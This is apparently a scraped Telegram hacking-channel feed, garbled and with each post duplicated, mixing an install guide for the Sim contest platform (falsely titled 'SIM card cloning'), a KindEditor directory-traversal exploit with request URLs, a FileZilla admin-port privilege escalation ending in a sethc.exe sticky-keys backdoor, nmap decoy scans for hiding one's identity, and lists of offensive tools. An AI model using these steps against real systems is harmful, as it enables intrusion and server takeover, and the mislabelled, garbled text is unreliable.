β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A REAL FREE SIM CARD CLONING-OPEN SOURCE :)
R E Q U I R E M E N T S :
-gcc/g++ (with 32 bit support β for compiling submissions) with C++17 support (Debian package: g++-multilib)
-MariaDB (Debian package: mariadb-server)
-MariaDB client library (Debian packages: libmariadbclient-dev)
-libseccomp (Debian package: libseccomp-dev)
-GNU/Make (Debian package: make version >= 4.2.1)
-libzip (Debian package: libzip-dev)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) Debian
sudo apt-get install g++-multilib mariadb-server libmariadbclient-dev libseccomp-dev libzip-dev make libssl-dev
2) Ubuntu is not officially supported, you may try it, it may (not) work. Modern versions of some of the above packages are needed to build sim sucessfully.
3) Arch Linux
> sudo pacman -S gcc mariadb mariadb-libs libseccomp libzip make && \
> sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql && \
> sudo systemctl enable mariadb && sudo systemctl start mariadb
π¦Instructions
In case you installed MariaDB server for the first time, you should run:
1οΈβ£sudo mysql_secure_installation
First of all clone the Sim repository and all its submodules
2οΈβ£git clone --recursive https://github.com/varqox/sim &&
3οΈβ£cd sim
4οΈβ£Build
5οΈβ£make -j $(nproc)
6οΈβ£Make sure that you have created MariaDB account and database for Sim, use command below to create user sim@localhost and database simdb (when asked for password, enter your mariadb root password, by default it is empty β if that does not work try running the below command with sudo):
> mysql -e "CREATE USER sim@localhost IDENTIFIED BY 'sim'; CREATE DATABASE simdb; GRANT ALL ON simdb.* TO 'sim'@'localhost';" -u root -p
7οΈβ£Install
8οΈβ£make install
9οΈβ£It will ask for MariaDB credentials. By default, step 4 created MariaDB username sim, password sim, database simdb and user host localhost.
πIf you want to install Sim in other location that build/ type
make install DESTDIR=where-you-want-Sim-to-install
Run sim-server and job-machine
make run
1οΈβ£1οΈβ£If you have not installed Sim in the default location use command:
make run DESTDIR=where-you-installed-Sim
1οΈβ£2οΈβ£You can combine building, installation and running commands into:
make all install run
1οΈβ£3οΈβ£Enter http://127.7.7.7:8080 via your web browser, by default a Sim root account was created there
username: sim
password: sim
1οΈβ£4οΈβ£Remember to change the password now (or later) if you want to make Sim website accessible to others. Do not make hacker's life easier!
Well done! You have just installed Sim. There is a sim-server configuration file where-you-installed-Sim/sim.conf (build/sim.conf by default) where server parameters like address, workers etc. are. Also, there are log files log/*.log that you would find useful if something didn't work.
1οΈβ£5οΈβ£If you want to run Sim at system startup then you can use crontab -- just add these lines to your crontab (using command crontab -e):
@reboot sh -c 'until test -e /var/run/mysqld/mysqld.sock; do sleep 0.4; done; BUILD="where-you-installed-Sim"; "$BUILD/sim-server"& "$BUILD/job-server"&'
where-you-installed-Sim = absolute path to Sim build directory e.g. /home/your_username/sim/build
ANY DOUBT ASK @Undercode_Testing
ENJOY β€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - varqox/sim: Sim is an open source platform for carrying out algorithmic contests and programming classes.
Sim is an open source platform for carrying out algorithmic contests and programming classes. - varqox/sim
stored xxs in facebook.pdf
441.5 KB
The Open Graph protocol When you add a URL in a Facebook post, Facebook will use the Open Graph protocol (FB doc) to display rich content. Here is a summary about how Facebook uses OG to embed external content in a FB post:
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
1. The aacker posts a URL on a FB post
2. FB server fetches the URL (server side) and reads the OG meta tags to extract info about the content of the URL (for example the content is a video with a tle, a cover image, a video encoding type and a video ο¬le URL)
3. The vicm views the FB post with the cover image and a play buon
4. When the vicm clicks on the play buon, the video loads using the video info extracted from the OG meta tags. This is when the XSS will be execute
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Disadvantages of Kali Linux
As we all know that Kali Linux operating system have lots of advantages but it have also some disadvantages too. By which users can be faced some unexpected problems. Some cons of Kali Linux are β
- It makes the system slower.
- The system can get easily corrupted.
-Some softwares may not be functioned well .
-KALI is not as easy to use because itβs penetration oriented.
-KALI is not exactly the most search (as in research), and training oriented Linux. You need to find and see Wiki sources
-forget about universities all anonymous hackers don.t use kali
-In the process of using KALI for NORMAL, you may Trash some of KALIβs specialized settings for itβs own security.
wiki resoucesxd
β β β Uππ»βΊπ«Δπ¬πβ β β β
Break webcam-cctv like expert .pdf
2.4 MB
Now it could be that your CCTV, IP camera is simply exposed on the Internet and the attacker has found it on sites such as Shodan. You havenβt changed the default password and bam, they are in. Watching your every move.
Forwarded from UNDERCODE NEWS
Vulnerability in current simple IoT modules could expose a significant number of devices worldwide to security risks
#Vulnerabilities
#Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem
KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.
> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Kindeditor traverse directory 0DAY problem
KindEditor is a set of open source HTML visual editor, mainly used to allow users to get WYSIWYG editing effects on websites, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, Opera. KindEditor is written in JavaScript and can be seamlessly integrated with Java, .NET, PHP, ASP and other programs.
> KindEditor is very suitable for use in CMS, shopping malls, forums, blogs, Wikis, emails and other Internet applications. Since the first release of 2.0 in , KindEditor has continued to expand the editor market share with its excellent user experience and leading technology. Has become one of the most popular editors in China.
π¦Use method:
1) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/, burst out the absolute path D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php
2) http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//According to the absolute path that broke out, modify the value of path to AppServ/www/67cms/
then it will be traversed d: All files and file names under /AppServ/www/67cms/
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speedup internet via DNS :
A) ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
-For IPv4: 1.1.1.1 and 1.0.0.1
-For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
B) WINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5)Double-click on the active network adapter.
6)Write down any existing DNS server entries for future reference.
7)Click Use The Following DNS Server Addresses.
8)Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
9) With Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
10) Click on Network and Internet.
11) Click on Change Adapter Settings.
12) Right click on the Wi-Fi network you are connected to, then click Properties.
13) Select Internet Protocol Version 4 (or Version 6 if desired).
14) Click Properties.
15) Write down any existing DNS server entries for future reference.
16) Click Use The Following DNS Server Addresses.
17) Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Speedup internet via DNS :
A) ROUTER
If you're using a router for your office network DNS settingsβand you probably areβlog into it and find your DNS server settings. Once there, note down your existing DNS records and replace them with the following:
-For IPv4: 1.1.1.1 and 1.0.0.1
-For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
That's it. The next time your computers look up a website, they'll use the 1.1.1.1 DNS services.
B) WINDOWS
With Windows 10:
1) Click on the Start menu.
2) Click on the Settings icon.
3) Click on Network & Internet.
4) Click on Change adapter options.
5)Double-click on the active network adapter.
6)Write down any existing DNS server entries for future reference.
7)Click Use The Following DNS Server Addresses.
8)Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
9) With Windows 7 and earlier, click on the Start menu, then click on Control Panel and follow these instructions:
10) Click on Network and Internet.
11) Click on Change Adapter Settings.
12) Right click on the Wi-Fi network you are connected to, then click Properties.
13) Select Internet Protocol Version 4 (or Version 6 if desired).
14) Click Properties.
15) Write down any existing DNS server entries for future reference.
16) Click Use The Following DNS Server Addresses.
17) Replace those addresses with the 1.1.1.1 DNS addresses:
For IPv4: 1.1.1.1 and 1.0.0.1
For IPv6: 2606:4700:4700::1111 and 2606:4700:4700::1001
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A GOOD 2020 of LIST TERMUX-LINUX TOOLS :
- Threadtear - Multifunctional Java Deobfuscation Tool Suite
- Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack
- Catchyou - FUD Win32 Msfvenom Payload Generator
- PayloadsAllTheThings - A List Of Useful Payloads And Bypass For Web Application Security And Pentest/CTF
- Exegol - Exegol Is A Kali Light Base With A Few Useful Additional Tools And Some Basic Configuration
- GDBFrontend - An Easy, Flexible And Extensionable GUI Debugger
- Shellerator - Simple CLI Tool For The Generation Of Bind And Reverse Shells In Multiple Languages
- Powerob - An On-The-Fly Powershell Script Obfuscator Meant For Red Team Engagements
- How to Set Up a VPN on Kodi in 2 Minutes or Less
- PowerSploit - A PowerShell Post-Exploitation Framework
- HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host
- Nexphisher - Advanced Phishing Tool For Linux & Termux
- TorghostNG - Make All Your Internet Traffic Anonymized Through Tor Network
- Sshprank - A Fast SSH Mass-Scanner, Login Cracker And Banner Grabber Tool Using The Python-Masscan Module
- Generator-Burp-Extension - Everything You Need About Burp Extension Generation
- Parsec - Secure Cloud Framework
- Invoker - Penetration Testing Utility
- Authelia - The Single Sign-On Multi-Factor Portal For Web Apps
- OSSEM - A Tool To Assess Data Quality
- Klar - Integration Of Clair And Docker Registry
- Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.
from git 2020β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A GOOD 2020 of LIST TERMUX-LINUX TOOLS :
- Threadtear - Multifunctional Java Deobfuscation Tool Suite
- Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack
- Catchyou - FUD Win32 Msfvenom Payload Generator
- PayloadsAllTheThings - A List Of Useful Payloads And Bypass For Web Application Security And Pentest/CTF
- Exegol - Exegol Is A Kali Light Base With A Few Useful Additional Tools And Some Basic Configuration
- GDBFrontend - An Easy, Flexible And Extensionable GUI Debugger
- Shellerator - Simple CLI Tool For The Generation Of Bind And Reverse Shells In Multiple Languages
- Powerob - An On-The-Fly Powershell Script Obfuscator Meant For Red Team Engagements
- How to Set Up a VPN on Kodi in 2 Minutes or Less
- PowerSploit - A PowerShell Post-Exploitation Framework
- HiveJack - This Tool Can Be Used During Internal Penetration Testing To Dump Windows Credentials From An Already-Compromised Host
- Nexphisher - Advanced Phishing Tool For Linux & Termux
- TorghostNG - Make All Your Internet Traffic Anonymized Through Tor Network
- Sshprank - A Fast SSH Mass-Scanner, Login Cracker And Banner Grabber Tool Using The Python-Masscan Module
- Generator-Burp-Extension - Everything You Need About Burp Extension Generation
- Parsec - Secure Cloud Framework
- Invoker - Penetration Testing Utility
- Authelia - The Single Sign-On Multi-Factor Portal For Web Apps
- OSSEM - A Tool To Assess Data Quality
- Klar - Integration Of Clair And Docker Registry
- Powershell-Reverse-Tcp - PowerShell Script For Connecting To A Remote Host.
from git 2020β
β β β Uππ»βΊπ«Δπ¬πβ β β β
KitPloit - PenTest & Hacking Tools
Threadtear - Multifunctional Java Deobfuscation Tool Suite
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Explain Filezilla server privilege escalation :
Server privilege escalation is abbreviated as privilege escalation, which refers to the promotion of the original 80 port low privileges, such as ordinary network privileges, to system privileges, thereby obtaining all control rights of the server.
Rights escalation can be roughly divided into three types, namely:
1) Stack Overflow executes arbitrary code;
2) Uses existing running software with system permissions;
3) Matches the password of the administrator account through social engineering.
> This undercode tutorial is talking about the second type, using the existing system permission program Filezilla to obtain permissions.
4) Filezilla is the same as a normal Web site. The front desk has a normal FTP account to perform upload, download, delete and other actions, while the backend has an administrator console to set the front desk account and account permissions.
5) The foreground is port 21, and the background is port 14147 by default. Our method of escalation is to illegally connect directly to port 14147, illegally log in to the remote Filezilla, and create an FTP account with all the permissions of the hard disk directory.
6) Confirm that the server is running Filezilla and port 14147 is opened, the steps are as follows:
7) The first step is to find the Filezilla directory. If you can't find it, just guess.
I directly packaged the entire filezilla directory and downloaded it, running on a remote independent ip server, and the connection port was changed from 14147 to 4444
The second step is to run lcx on the independent IP server to monitor and forward the port
> lcx -l 3333 4444
8) The third step is to run Filezilla on an independent ip server, and the connection port is 4444
& now you can see pass
9) The fourth step is to use Filezilla to create an account with C drive permissions. You must have the permissions to read, write, create, delete.
10) If the network speed is unstable and the account creation fails, you can select one option and confirm it once, then reopen the settings card and select the next option.
11) Now as long as you connect to FTP and replace sethc.exe, you can log in with 3389 connection and 5 shifts.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Explain Filezilla server privilege escalation :
Server privilege escalation is abbreviated as privilege escalation, which refers to the promotion of the original 80 port low privileges, such as ordinary network privileges, to system privileges, thereby obtaining all control rights of the server.
Rights escalation can be roughly divided into three types, namely:
1) Stack Overflow executes arbitrary code;
2) Uses existing running software with system permissions;
3) Matches the password of the administrator account through social engineering.
> This undercode tutorial is talking about the second type, using the existing system permission program Filezilla to obtain permissions.
4) Filezilla is the same as a normal Web site. The front desk has a normal FTP account to perform upload, download, delete and other actions, while the backend has an administrator console to set the front desk account and account permissions.
5) The foreground is port 21, and the background is port 14147 by default. Our method of escalation is to illegally connect directly to port 14147, illegally log in to the remote Filezilla, and create an FTP account with all the permissions of the hard disk directory.
6) Confirm that the server is running Filezilla and port 14147 is opened, the steps are as follows:
7) The first step is to find the Filezilla directory. If you can't find it, just guess.
I directly packaged the entire filezilla directory and downloaded it, running on a remote independent ip server, and the connection port was changed from 14147 to 4444
The second step is to run lcx on the independent IP server to monitor and forward the port
> lcx -l 3333 4444
8) The third step is to run Filezilla on an independent ip server, and the connection port is 4444
& now you can see pass
9) The fourth step is to use Filezilla to create an account with C drive permissions. You must have the permissions to read, write, create, delete.
10) If the network speed is unstable and the account creation fails, you can select one option and confirm it once, then reopen the settings card and select the next option.
11) Now as long as you connect to FTP and replace sethc.exe, you can log in with 3389 connection and 5 shifts.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking_with_ZANTI_The_mobile_pentesting_Toolkit_2019_latest_update.pdf
3.3 MB
Letβs first see what exactly can you do using zANTI
1. Hijack HTTP Sessions via MITM 2. Capture Downloads 3. Modify HTTP requests and responses via MITM 4. Exploit routers 5. Hack Passwords 6. Check a Device for Shellshock and SSL Poodle Vulnerabilities 7. Do a nmap detailed scan
1. Hijack HTTP Sessions via MITM 2. Capture Downloads 3. Modify HTTP requests and responses via MITM 4. Exploit routers 5. Hack Passwords 6. Check a Device for Shellshock and SSL Poodle Vulnerabilities 7. Do a nmap detailed scan
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Nmap ("Network Mapper") tutorial termux
1) apt install nmap (linux)
2) pkg get nmap (termux)
3) to start Nmap simply type and hit enter.
4) type nmap
you will get options for scanning.
5) now you can use nmap using commands like.
nmap -v -A 204.14.72.187
6) spoof or decoy scan
Nmap allows us to use decoy IP addresses in order that it's like many IP addresses are scanning the target.
When we are scanning machines that aren't ours, we frequently want to cover our IP (our identity). Obviously, every packet must contain our source address alternatively the response from the target system won't know where to return to.
nmap -sS 192.168.0.0 -D 10.0.0.1,10.0.0.2,10.0.0.4
7) Output to a File
many times we need output of scans for later references and use with other tools. to save lots of output in NMAP simply use -oN switch.
add -oN command and after that name of the file you want to output in. Here, I have used a file named "nmapscan.txt"
nmap -sS 192.168.89.191 -oN nmapscan
now cat this output to see what's in it using the command
> cat nmapscan
8) ARP scan (Address Resolution Protocol) :
> nmap --arp-type ARP (target IP)
9) TCP connect scan:
nmap -sT (IP address)
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Nmap ("Network Mapper") tutorial termux
1) apt install nmap (linux)
2) pkg get nmap (termux)
3) to start Nmap simply type and hit enter.
4) type nmap
you will get options for scanning.
5) now you can use nmap using commands like.
nmap -v -A 204.14.72.187
6) spoof or decoy scan
Nmap allows us to use decoy IP addresses in order that it's like many IP addresses are scanning the target.
When we are scanning machines that aren't ours, we frequently want to cover our IP (our identity). Obviously, every packet must contain our source address alternatively the response from the target system won't know where to return to.
nmap -sS 192.168.0.0 -D 10.0.0.1,10.0.0.2,10.0.0.4
7) Output to a File
many times we need output of scans for later references and use with other tools. to save lots of output in NMAP simply use -oN switch.
add -oN command and after that name of the file you want to output in. Here, I have used a file named "nmapscan.txt"
nmap -sS 192.168.89.191 -oN nmapscan
now cat this output to see what's in it using the command
> cat nmapscan
8) ARP scan (Address Resolution Protocol) :
> nmap --arp-type ARP (target IP)
9) TCP connect scan:
nmap -sT (IP address)
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
Detecting_malicious_downloads_with_Osquery,_Rsyslog,_Kafka,_Python3.pdf
1.4 MB
-Learning to use Kafka with Python Learn
-how to leverage VirusTotal to detect malicious files Deploying Kafka and Rsyslog server on Docker
-how to leverage VirusTotal to detect malicious files Deploying Kafka and Rsyslog server on Docker